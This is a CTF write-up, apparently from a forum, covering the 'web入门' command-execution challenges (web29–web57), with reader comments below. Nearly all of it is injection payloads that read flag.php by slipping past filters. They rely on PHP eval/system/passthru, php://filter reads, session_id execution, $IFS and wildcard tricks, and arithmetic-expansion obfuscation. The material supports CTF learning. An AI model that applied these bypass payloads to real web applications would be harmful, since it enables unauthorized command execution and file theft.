>
>
web入门之命令执行
Firebasky
命令执行
by Firebasky
web29
echo `nl fl''ag.php`;
查看源代码web30
echo `nl fl''ag.p''hp`;
查看源代码web31
show_source(next(array_reverse(scandir(pos(localeconv())))));
c=$a=show_source($_GET[1])?>&1=flag.php
c=eval($_GET[1])?>&1=system('cat flag.php');
c=?><?=`$_GET[1]`;&1=cat flag.php
查看源代码c=?><?=passthru($_GET[1]);&1=cat flag.php查看源代码
web32
c=$nice=include$_GET["url"]?>&url=php://filter/read=convert.base64-encode/resource=flag.phpweb33-36一样
c=?><?=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php
c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php
web36把参数换成字母a
web40
show_source(next(array_reverse(scandir(pos(localeconv())))));
GXYCTF的禁止套娃
通过cookie获得参数进行命令执行
c=session_start();system(session_id());
passid=lsweb41
参考羽师傅wp
web42
payload:
cat flag.php%0a查看源代码
web43
nl flag.php%0a查看源代码
web44
nl fla*.php%0a查看源代码
web45
echo$IFS`tac$IFS*`%0Aweb46
nl<fla''g.php||
查看源代码web47-51
和web46一样
web52
nl$IFS/fla''g||
web53
c''at${IFS}fla''g.p''hp
web54
/bin/?at${IFS}f???????
web55
https://blog.csdn.net/qq_46091464/article/details/108513145
https://blog.csdn.net/qq_46091464/article/details/108557067
web56
https://blog.csdn.net/qq_46091464/article/details/108513145
web57
payload:
$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))
${_} ="" //返回上一次命令
$((${_}))=0
$((~$((${_}))))=-1Firebasky
希望师傅们分享自己的骚姿势呀
hdxw
grep flag flag.php就不用查看网页源码了
或者cat flag.php | grep flag
Jiang
web54 的payload 有大佬解释一下么?
Firebasky
Jiang 这里是使用的cat命令 cat命令是存在/bin/cat 因为默认配置了环境变量使用才可以直接使用cat 但是实际上cat是可以使用 /bin/cat.
后面是${IFS}是表示空格的意思
f???????表示flag.php
Jiang
Firebasky 大佬牛逼!
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论